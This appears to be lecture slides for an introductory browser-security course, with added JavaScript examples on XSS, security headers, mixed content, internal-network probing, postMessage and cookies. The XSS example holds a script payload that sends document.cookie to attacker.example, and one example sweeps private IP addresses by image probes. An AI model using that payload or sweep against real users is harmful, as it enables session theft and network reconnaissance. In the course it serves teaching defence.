CSCI-UA.9480 Introduction to Computer Security Session 4.1 Browser - - PowerPoint PPT Presentation



slide-1
SLIDE 1

CSCI-UA.9480 Introduction to Computer Security

Session 4.1

Browser Security Model

  • Prof. Nadim Kobeissi
slide-2
SLIDE 2

Defining Browser Security Goals

Also before we start: Practical Assignment 2 is now online.

2 CSCI-UA.9480: Introduction to Computer Security – Nadim Kobeissi

4.1a

slide-3
SLIDE 3

Browser security goals.

  • Confidentiality: information on your device is not put at risk simply by browsing the web.
  • Integrity: different websites are managed through different sessions, in isolation from one another, so one site cannot read or tamper with another site's state.

More far-reaching goals could include giving web applications the same security guarantees as desktop applications.
slide-4
SLIDE 4

Can web apps be as trustworthy as local apps?

Example: ProtonMail.
  • ProtonMail ensures its security guarantees through TLS and client-side encryption.
  • However, a malicious (or compromised) ProtonMail server can imperceptibly serve modified code to selected sessions: the browser runs whatever JavaScript it receives on each page load, with no way to tell it apart from the genuine code.
  • This is very different from desktop and mobile applications, which have code signing and versioning, so a changed application is both visible and attributable.

slide-5
SLIDE 5

Browser security threat model.

[Figure: Alice's browser connects over the Internet to the server for google.com.]
slide-6
SLIDE 6

Browser security threats: web attacker.

[Figure: the same picture, but Alice's browser reaches the attacker's look-alike server, gooogle.com.]
slide-7
SLIDE 7

Browser security threats: web attacker.

[Figure: the attacker's server sends Alice the message "Log into apple-icloud.com to reset your password!"]
slide-8
SLIDE 8

Browser security threats: network attacker.

[Figure: the attacker sits on the Internet path between Alice's browser and the server for google.com.]
slide-9
SLIDE 9

Browser security threats: software attacker.

[Figure: the attacker targets the software itself, in the browser or on the server: XSS? RCE?]
slide-10
SLIDE 10

Browser security threats: software attacker.

[Figure: the attacker sends Alice "Open this attachment, your latest bill!"; the attachment contains exploit code.]
slide-11
SLIDE 11

Comparing different attackers.

Web attacker.
  • Controls their own website, for which they can obtain valid TLS certificates, etc.
  • The user is misled into visiting the attacker's website. Fundamentally an authentication issue: the user cannot tell the attacker's site from the real one.

Network attacker.
  • Passive eavesdropping or active traffic modification. Mitigated by TLS.

Software attacker.
  • Actually finds bugs, tries to run code via XSS, maybe pop a shell…
slide-12
SLIDE 12

Comparing different attackers.

Software attacker.
  • Actually finds bugs, tries to run code via XSS, maybe pop a shell…
  • Cross-site scripting (XSS): inject code into a page that is later executed in the browser of a separate client the attacker does not control. (Can you come up with XSS scenarios?)
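An added example (not from the slides) of one XSS scenario the question above invites: a reflected XSS, where a page echoes a query-string parameter straight into its HTML. The vulnerable and fixed renderers sit side by side; the hostnames victim.example and attacker.example are placeholders.

```javascript
// Added example, not course code: a reflected-XSS scenario and its fix.
// A page greets the user by a name taken from the query string. The vulnerable
// version pastes the raw value into HTML; the fixed version escapes it.

// Minimal HTML escaper for text placed between tags or inside a quoted
// attribute value. Other contexts (JS, CSS, URL) need context-specific escaping.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable: whatever the attacker puts in ?name= becomes markup.
function renderGreetingVulnerable(query) {
  const name = new URLSearchParams(query).get('name') ?? 'guest';
  return `<h1>Hello, ${name}!</h1>`;
}

// Fixed: the same value is rendered as text, never as markup.
function renderGreetingSafe(query) {
  const name = new URLSearchParams(query).get('name') ?? 'guest';
  return `<h1>Hello, ${escapeHtml(name)}!</h1>`;
}

// Crude detector for the demo: does the output contain a <script> tag the
// template did not put there? (A real check would load it in a browser.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker input: the query string of a link the web attacker
// tricks Alice into clicking, e.g. https://victim.example/greet?name=...
const ATTACK_QUERY =
  'name=' + encodeURIComponent('<script>fetch("https://attacker.example/?c="+document.cookie)</script>');

console.log(renderGreetingVulnerable(ATTACK_QUERY)); // the script lands in the page
console.log(renderGreetingSafe(ATTACK_QUERY));       // rendered as inert text
```

The injected script runs in the victim's session on victim.example, so it can read that origin's DOM and cookies (unless they are HttpOnly) and ship them to the attacker; the escaped version shows the same string to the user as harmless text.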
slide-13
SLIDE 13

Browser security goals.

  • Confidentiality: information on your device
is not put at risk simply by browsing the web.
  • Integrity: different websites are managed through different sessions, in isolation from one another.
slide-14
SLIDE 14

Browser Security Mechanisms


4.1b

slide-15
SLIDE 15

Browser security mechanisms to cover.

  • HTTP.
  • Rendering Content.
  • Isolation.
  • Communication.
  • Security User Interface.
  • Cookies.
Many more mechanisms exist. It's impossible to cover them all.
slide-16
SLIDE 16

URIs.


https://facebook.com/login.php?target=newsFeed#latest

slide-17
SLIDE 17

URIs.

https://facebook.com/login.php?target=newsFeed#latest

  • Protocol: https
  • Hostname (can include a port): facebook.com
  • Path: /login.php
  • Query: ?target=newsFeed
  • Fragment: #latest. Not sent to the server (except if JavaScript explicitly reads it and sends it).

The path and query are encrypted if using HTTPS; the hostname is still visible to the network through DNS and the TLS SNI extension.
slide-18
SLIDE 18

HTTP.

POST /login HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.nyu.edu
Content-Type: application/x-www-form-urlencoded
Content-Length: length
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

username=bob&password=logmein23

GET /index.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.nyu.edu
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
slide-19
SLIDE 19

HTTP.

HTTP/1.1 200 OK
Date: Mon, 27 Jul 2018 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Last-Modified: Wed, 22 Jul 2018 19:15:56 GMT
Content-Length: 88
Content-Type: text/html
Connection: close

<html>
<body>
<h1>Hello, World!</h1>
</body>
</html>
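An added example, not part of the original deck, tying the URI anatomy of slide 17 to the request of slide 18: it builds the GET request a browser would send for a URL and sorts the URL's parts by who can observe them. It uses only the WHATWG URL API available in browsers and Node; the URLs are the slides' own.

```javascript
// Added example, not course code: what the network, the server and the
// browser each get to see of a URL.

// Build the HTTP/1.1 request a browser sends for `urlString`.
// The request-target is path + query only; the fragment never leaves the browser.
function buildGetRequest(urlString) {
  const u = new URL(urlString);
  if (u.protocol !== 'http:' && u.protocol !== 'https:') {
    throw new Error('only http/https URLs have an HTTP request form');
  }
  const requestTarget = u.pathname + u.search;   // e.g. "/login.php?target=newsFeed"
  const lines = [
    `GET ${requestTarget} HTTP/1.1`,
    `Host: ${u.host}`,                            // host[:port]; port omitted when default
    'Connection: close',
    '', '',                                        // blank line ends the header block
  ];
  return lines.join('\r\n');
}

// Split a URL by who can observe each part when the page is fetched over HTTPS.
function exposure(urlString) {
  const u = new URL(urlString);
  return {
    // Scheme, host and port are needed to open the connection, so the network
    // learns them from DNS and the TLS SNI extension (unless ECH is in use).
    visibleToNetwork: {
      scheme: u.protocol.replace(':', ''),
      host: u.hostname,
      port: u.port || (u.protocol === 'https:' ? '443' : '80'),
    },
    // Path and query travel inside the TLS tunnel: the server sees them, the network does not.
    encryptedToServer: { path: u.pathname, query: u.search },
    // The fragment stays in the browser; only page JavaScript can read it (location.hash).
    browserOnly: { fragment: u.hash },
  };
}

console.log(buildGetRequest('https://facebook.com/login.php?target=newsFeed#latest'));
console.log(exposure('https://facebook.com/login.php?target=newsFeed#latest'));
```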
slide-20
SLIDE 20

Examples of HTTP headers related to security.

Strict-Transport-Security: max-age=<expirationtime>; includeSubDomains
Content-Security-Policy: <directive>
X-Frame-Options: DENY

  • HTTP Strict Transport Security (HSTS): instructs the browser to only connect to this domain over HTTPS for the next specified period of time (and, with includeSubDomains, to its subdomains too).
  • Content Security Policy (CSP): disable dangerous JavaScript and CSS features (such as inline scripts) and prevent loading content from resource addresses not on the allow-list.
  • X-Frame-Options: prevent this page from being loaded in an iframe on other websites (a clickjacking defence). The CSP frame-ancestors directive is the modern equivalent.
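An added example (not the course's code) that audits those three headers over constructed responses. The directive and attribute names are the real ones; the thresholds, such as requiring a one-year HSTS max-age, are this example's own policy choices.

```javascript
// Added example, not course code: a small security-header audit.

const ONE_YEAR = 365 * 24 * 60 * 60;

// Parse a Content-Security-Policy value into { directive: [sources...] }.
function parseCsp(value) {
  const policy = {};
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources.map((s) => s.toLowerCase());
  }
  return policy;
}

// `headers` is a plain object of lower-case header name -> value, as a proxy or
// test harness would collect them. Returns a list of findings (empty = clean).
function auditSecurityHeaders(headers) {
  const findings = [];

  const hsts = headers['strict-transport-security'];
  if (!hsts) {
    findings.push('HSTS missing: the first request can still go over plain HTTP');
  } else {
    const m = /max-age\s*=\s*(\d+)/i.exec(hsts);
    const maxAge = m ? Number(m[1]) : 0;
    if (maxAge < ONE_YEAR) findings.push(`HSTS max-age ${maxAge} is below one year (this audit's threshold)`);
    if (!/includeSubDomains/i.test(hsts)) findings.push('HSTS lacks includeSubDomains');
  }

  const csp = headers['content-security-policy'];
  const policy = csp ? parseCsp(csp) : null;
  if (!policy) {
    findings.push('CSP missing: injected scripts run with full page privileges');
  } else {
    const scriptSrc = policy['script-src'] || policy['default-src'] || [];
    if (scriptSrc.includes("'unsafe-inline'")) findings.push("CSP allows 'unsafe-inline' scripts, which defeats its XSS protection");
    if (scriptSrc.includes('*')) findings.push('CSP script-src allows any origin');
    if (!('object-src' in policy) && !('default-src' in policy)) findings.push('CSP does not restrict object-src (plugins)');
  }

  // Either header stops framing; frame-ancestors wins in browsers that support both.
  if (!headers['x-frame-options'] && !(policy && policy['frame-ancestors'])) {
    findings.push('No X-Frame-Options or CSP frame-ancestors: the page can be framed (clickjacking)');
  }

  return findings;
}

// Constructed sample responses.
const WEAK_HEADERS = {
  'content-type': 'text/html',
  'strict-transport-security': 'max-age=300',
  'content-security-policy': "default-src 'self'; script-src 'self' 'unsafe-inline'",
};
const STRONG_HEADERS = {
  'content-type': 'text/html',
  'strict-transport-security': 'max-age=31536000; includeSubDomains',
  'content-security-policy': "default-src 'self'; script-src 'self' https://resources.nyu.edu; object-src 'none'; frame-ancestors 'none'",
  'x-frame-options': 'DENY',
};

console.log(auditSecurityHeaders(WEAK_HEADERS));
console.log(auditSecurityHeaders(STRONG_HEADERS)); // []
```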
slide-21
SLIDE 21

HTTPS and mixed content.

  • Even if an entire website is loaded using HTTPS, a single resource being served over HTTP can give a network attacker leverage.
  • Especially if it's executed: a script is active mixed content, and a script modified in transit runs with the full privileges of the HTTPS page.

<html>
  <head>
    <title>NYU</title>
    <script type="application/javascript" src="https://resources.nyu.edu/login.js"></script>
    <script type="application/javascript" src="http://jquerycdn.com/jquery.js"></script>
  </head>
  <body>
  </body>
</html>
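An added example, not from the slides, that scans markup for mixed content and tells active resources from passive ones. The sample page is constructed from the slide's document plus one http: image and one plain link; it is a static scan, so resources added later by JavaScript would need a real DOM or the browser's own console to catch.

```javascript
// Added example, not course code: find mixed content in an HTTPS page's markup.
// Browsers treat script, iframe, stylesheet and plugin loads as "active" mixed
// content and block them by default; images, audio and video are "passive"
// (historically allowed with a warning; newer Chrome versions upgrade or block them too).

const ACTIVE_TAGS = new Set(['script', 'iframe', 'link', 'object', 'embed']);

function findMixedContent(html, pageUrl) {
  if (new URL(pageUrl).protocol !== 'https:') return []; // only meaningful on an HTTPS page
  const findings = [];
  // Match <tag ... src|href=http://...> (quoted or bare); stops at the end of the tag.
  const tagRe = /<(\w+)\b[^>]*?\b(?:src|href)\s*=\s*["']?(http:\/\/[^"'\s>]+)/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    if (tag === 'a') continue;   // a plain link navigates; it is not mixed content
    findings.push({ tag, url: m[2], kind: ACTIVE_TAGS.has(tag) ? 'active' : 'passive' });
  }
  return findings;
}

// Constructed page: the slide's document plus a passive http: image and a link.
const PAGE = `<html><head><title>NYU</title>
<script type="application/javascript" src="https://resources.nyu.edu/login.js"></script>
<script type="application/javascript" src="http://jquerycdn.com/jquery.js"></script>
</head><body><img src="http://cdn.example/logo.png"><a href="http://example.com/">x</a></body></html>`;

console.log(findMixedContent(PAGE, 'https://www.nyu.edu/'));
```

Beyond scanning, the server-side fix is to reference every subresource over https: (or scheme-relative) and to send Content-Security-Policy: upgrade-insecure-requests, which makes the browser rewrite any remaining http: subresource URLs to https: before fetching.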
slide-22
SLIDE 22

Rendering content.

  • Browsers will load content (HTML, XML, CSS), parse it into the Document Object Model (DOM), a tree of nodes, and render that tree.
  • Elements within the DOM can contain content, can have attributes and can even trigger events handled by JavaScript code.
  • JavaScript is, of course, not rendered but executed.

[Figure: DOM tree of a small document. document → root element <html> → element <head> (containing <title> with text "My title") and element <body> (containing <h1> with text "A heading", and <a> with attribute href and text "Link text").]
slide-23
SLIDE 23

Rendering content.

  • Elements in the DOM have methods (like objects in OO programming): document.write(), document.getElementById(), etc.
  • In many ways, the DOM is adjacent to the Browser Object Model (BOM): window, document, history, navigator…
slide-24
SLIDE 24

Using JavaScript to learn local information.

  • Example: request images from internal IP addresses:
  • <img src="http://192.168.0.4:8080/"/>
  • Use a timeout together with the onload/onerror events to determine success or failure: a host that answers (even with an error) fires an event quickly, one that is absent or filtered does not.
  • Create a map/fingerprint of local systems, all from a public web page, because the requests are made by the victim's browser from inside their network.

Browser vendors have been adding restrictions on requests from public pages to private addresses (Chrome's Private Network Access work), but the basic technique has worked for years.
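An added example (not the slide's code) of the image-probe technique. The part that needs a browser, creating an <img>, is passed in as a function so the sweep can run offline with a fake; in a real page you would pass (src) => Object.assign(new Image(), { src }). The addresses and the set of "live" hosts are constructed.

```javascript
// Added example, not course code: host discovery through image loads.

// Probe one host:port. Resolves 'reachable' if the image request gets any
// answer (a 404 or a refused connection fires onerror almost at once), or
// 'filtered' if nothing answers before the timeout. The page never sees the
// response bytes; it learns only timing and success/failure.
function probeHost(host, port, createImage, timeoutMs = 1500) {
  return new Promise((resolve) => {
    const started = Date.now();
    let settled = false;
    const finish = (verdict) => {
      if (settled) return;
      settled = true;
      clearTimeout(timer);
      resolve({ host, port, verdict, ms: Date.now() - started });
    };
    const timer = setTimeout(() => finish('filtered'), timeoutMs);
    const img = createImage(`http://${host}:${port}/favicon.ico`);
    img.onload = () => finish('reachable');   // a real image came back
    img.onerror = () => finish('reachable');  // fast error: something answered the connection
  });
}

// Sweep a set of last octets under one /24 prefix and return the hosts that answered.
async function sweep(prefix, lastOctets, port, createImage, timeoutMs) {
  const results = await Promise.all(
    lastOctets.map((n) => probeHost(`${prefix}.${n}`, port, createImage, timeoutMs)),
  );
  return results.filter((r) => r.verdict === 'reachable').map((r) => r.host);
}

// Fake image factory for offline runs (constructed data): hosts in LIVE answer
// with onerror after 5 ms; everything else never calls back, so the timeout
// classifies it as filtered.
const LIVE = new Set([
  'http://192.168.0.1:8080/favicon.ico',
  'http://192.168.0.4:8080/favicon.ico',
]);
function fakeImageFactory(src) {
  const img = { src, onload: null, onerror: null };
  if (LIVE.has(src)) setTimeout(() => img.onerror && img.onerror(), 5);
  return img;
}

sweep('192.168.0', [1, 2, 3, 4], 8080, fakeImageFactory, 50)
  .then((hosts) => console.log('reachable:', hosts));
```

The timing field is the interesting part for fingerprinting: a refused connection, a served 404 and a real favicon all end up as onerror or onload but with different delays, which is enough to guess what is listening.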
slide-25
SLIDE 25

Isolation and Communication.

  • Iframes: split a page into separate, isolated segments, each with its own JavaScript namespace; the same-origin policy stops a frame from reading the DOM of a frame served from a different origin.
  • Windows and their frames may interact through a restricted API: window.postMessage. The receiver must check event.origin before trusting a message, and the sender should name the target origin rather than "*".
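An added example, not from the slides, showing both halves of a postMessage exchange with the checks each side should make. It follows the browser API shape (event.origin, event.data, targetWindow.postMessage) but is exercised with constructed event objects so it runs without a browser; the origins are placeholders.

```javascript
// Added example, not course code: origin-checked postMessage on both sides.

const TRUSTED_PARENT = 'https://app.nyu.example';   // assumed origin of the embedding page

// Receiver (inside the iframe): ignore anything not from the expected origin,
// and validate the message shape before acting on it. Returns what was done.
function makeMessageHandler(allowedOrigin, actions) {
  return function onMessage(event) {
    if (event.origin !== allowedOrigin) {
      return { accepted: false, reason: 'untrusted origin ' + event.origin };
    }
    const msg = event.data;
    if (!msg || typeof msg !== 'object' || typeof msg.type !== 'string') {
      return { accepted: false, reason: 'malformed message' };
    }
    const handler = actions[msg.type];
    if (!handler) return { accepted: false, reason: 'unknown type ' + msg.type };
    return { accepted: true, result: handler(msg) };
  };
}

// Sender: never use '*' as the target origin when the message carries anything
// sensitive; if the frame has been navigated elsewhere, that page would get it.
function sendToFrame(frameWindow, message, targetOrigin) {
  if (targetOrigin === '*') {
    throw new Error("refusing to postMessage with targetOrigin '*'");
  }
  frameWindow.postMessage(message, targetOrigin);
  return { message, targetOrigin };
}

const widgetHandler = makeMessageHandler(TRUSTED_PARENT, {
  setTheme: (m) => `theme set to ${m.theme}`,
});

// Constructed events, shaped as a browser would deliver them to window.onmessage.
const GOOD_EVENT = { origin: TRUSTED_PARENT, data: { type: 'setTheme', theme: 'dark' } };
const EVIL_EVENT = { origin: 'https://attacker.example', data: { type: 'setTheme', theme: 'pwned' } };

console.log(widgetHandler(GOOD_EVENT));
console.log(widgetHandler(EVIL_EVENT));
```

In a real page the receiver is registered with window.addEventListener('message', widgetHandler) and the sender calls sendToFrame(iframe.contentWindow, msg, 'https://widget.example'); the checks are the same.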
slide-26
SLIDE 26

Security User Interface.

  • Users need to check for many markers:
    • Is the site using TLS?
    • Is the URL accurate?
  • Extended validation sometimes helps (though major browsers have since stopped showing the EV organisation name in the address bar).
  • Users can still be misled by a padlock.jpg: a picture of a padlock inside the page is not the browser's own indicator.
slide-27
SLIDE 27

Cookies.

Cookies act as session identifiers or key-value stores shared between the web client and web server.
  • Once the client logs in, the server may issue them a secret session cookie that they both then keep track of.
  • Secure cookies are sent only over HTTPS.
  • HttpOnly cookies can be sent over HTTP or HTTPS (misleading name) but cannot be accessed by JavaScript via document.cookie.

Set-Cookie: NAME=VALUE; Domain=...; Expires=...; Secure; HttpOnly
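An added example (not from the slides) that builds a Set-Cookie header with the attributes just listed and then models the browser's two rules: Secure cookies go only over HTTPS, and HttpOnly cookies are invisible to document.cookie. The cookie names and values are constructed.

```javascript
// Added example, not course code: Set-Cookie attributes and what they control.

// Build a Set-Cookie header value. Secure and HttpOnly default to on; a session
// cookie should normally keep both.
function setCookieHeader(name, value, { domain, maxAge, secure = true, httpOnly = true, sameSite = 'Lax' } = {}) {
  if (/[;=\s]/.test(name)) throw new Error('invalid cookie name');
  const parts = [`${name}=${encodeURIComponent(value)}`];
  if (domain) parts.push(`Domain=${domain}`);
  if (maxAge !== undefined) parts.push(`Max-Age=${maxAge}`);
  parts.push('Path=/');
  if (secure) parts.push('Secure');      // flag: only sent over HTTPS
  if (httpOnly) parts.push('HttpOnly');  // flag: hidden from document.cookie
  if (sameSite) parts.push(`SameSite=${sameSite}`);
  return parts.join('; ');
}

// Parse a Set-Cookie value into { name, value, attrs } (attribute names lower-cased,
// bare flags stored as true).
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const attrs = {};
  for (const a of rest) {
    const i = a.indexOf('=');
    attrs[(i < 0 ? a : a.slice(0, i)).toLowerCase()] = i < 0 ? true : a.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: decodeURIComponent(pair.slice(eq + 1)), attrs };
}

// Tiny model of the browser's cookie jar. `scheme` is the scheme of the request
// being made; `viaScript` is true when document.cookie is being read instead.
function cookiesVisible(jar, { scheme, viaScript }) {
  return jar
    .filter((c) => !(c.attrs.secure && scheme !== 'https'))   // Secure: HTTPS only
    .filter((c) => !(viaScript && c.attrs.httponly))          // HttpOnly: never to JS
    .map((c) => c.name);
}

// Constructed jar: a session id set properly, and a preference cookie set loosely.
const JAR = [
  parseSetCookie(setCookieHeader('session', 'a1b2c3', { maxAge: 3600 })),
  parseSetCookie(setCookieHeader('theme', 'dark', { secure: false, httpOnly: false })),
];

console.log(cookiesVisible(JAR, { scheme: 'https', viaScript: false })); // both
console.log(cookiesVisible(JAR, { scheme: 'http', viaScript: false }));  // theme only
console.log(cookiesVisible(JAR, { scheme: 'https', viaScript: true }));  // theme only
```

The last line is why HttpOnly matters for the XSS discussion earlier: an injected script can read the theme cookie but not the session cookie, although it can still make requests that carry it.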
slide-28
SLIDE 28

Next time: Web Application Security

Review this learning tool for next time! https://unescape-room.jobertabma.nl


4.2